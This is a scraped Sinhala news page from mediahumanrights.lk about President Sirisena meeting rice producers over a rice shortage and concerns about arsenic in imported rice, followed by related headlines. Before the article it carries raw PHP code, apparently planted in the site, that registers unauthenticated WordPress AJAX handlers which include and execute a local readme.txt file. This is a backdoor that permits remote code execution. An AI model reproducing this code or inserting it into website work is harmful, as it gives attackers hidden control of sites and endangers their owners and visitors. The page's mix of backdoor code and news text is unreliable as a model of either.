if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } සහල් නිෂ්පාදකයින් හා ජනාධිපති අතර සාකච්ඡාවක් - mediahumanrights.lk
mediahumanrights.lk
Local News News

සහල් නිෂ්පාදකයින් හා ජනාධිපති අතර සාකච්ඡාවක්

ජනාධිපති මෛත්‍රීපාල සිරිසේන මහතා සහ සහල් නිෂ්පාදකයින් අතර විශේෂ සාකච්ඡාවක්  මේ වන විට පැවැත්වේ.
ජනාධිපති කාර්යාලයේ දී මෙම සාකච්ඡාව පැවැත්වෙන බව වාර්තා වේ.
සහල් නිෂ්පාදකයින්,  සහල් ආනයනකරුවන්, වී මෝල් හිමියන් ඇතුළු පිරිසක් සහ පාරිභෝගික කටයුතු පිළිබද අධිකාරියේ නියෝජිතයින් මෙම සාකච්ඡාවට එක්ව සිටින බව සඳහන්වේ.
දැනට රට තුළ මතුව ඇති සහල් ගැටළුව හේතුවෙන් සහල් නිෂ්පාදකයින් මුහුණ දී සිටින තත්ත්වය පිළිබඳ ජනාධිපතිවරයා දැනුවත් කිරීම මෙම සාකච්ඡාවේ  අරමුණ බව මරදගහමුල සහල් නිෂ්පාදකයින්ගේ සංගමයේ සභාපති බි.කේ.රංජිත් මහතා පැවසුවේය.
මේ අතර ඊයේ(13) වව්නියාව ප්‍රදේශයේ සංචාරයක නිරත වු කර්මාන්ත හා වාණිජ කටයුතු අමාත්‍ය රිෂාද් බදියුදීන් මහතා සඳහන් කළේ දිවයින පුරා සතොස අලෙවිසැල් සහ සමූපකාර හරහා හිඟයකින් තොරව සහල් ලබාදීමට කටයුතු යොදා ඇති බවය.
තවද මියෙන්මාරයෙන් ආනයනය කරන සහල්වල ආසනික් ප්‍රතිශතය   ඉහළ අගයක් ගැනීම හේතුවෙන් පරික්ෂා කිරීමකින් තොරව එම සහල් වෙළෙදපලට මුදාහැරීමෙන් වලකින ලෙස රජරට විශ්ව විද්‍යාලයේ වෛද්‍ය පීඨයේ ජ්‍යෙෂ්ඨ කථිකාචාර්ය වෛද්‍ය චන්න ජයසුමන මහතා බලධාරීන්ගෙන් ඉල්ලීමක් කර තිබේ.

Related posts

ඉන්ධනවලට සැකසූ මිල සූත්‍රය හෙට කැබිනට් මණ්ඩලයට

Shiran Viraj

නිවෙස්වලින් අතුරුදන් වූ සිසුවිය සහ සිසුවා මහවැලි ගඟට පනී

Shiran Viraj

අවුරුදු 19-25 වයස් කාණ්ඩයේ තරුණයින් අතර HIV ආසාදනයේ වීමේ වර්ධනයක් : පුද්ගලයින් 1600ක් ආසාදිතයින් බව නොදැන සමාජයේ සිටින බවට අනතුරු අඟවයි

Shiran Viraj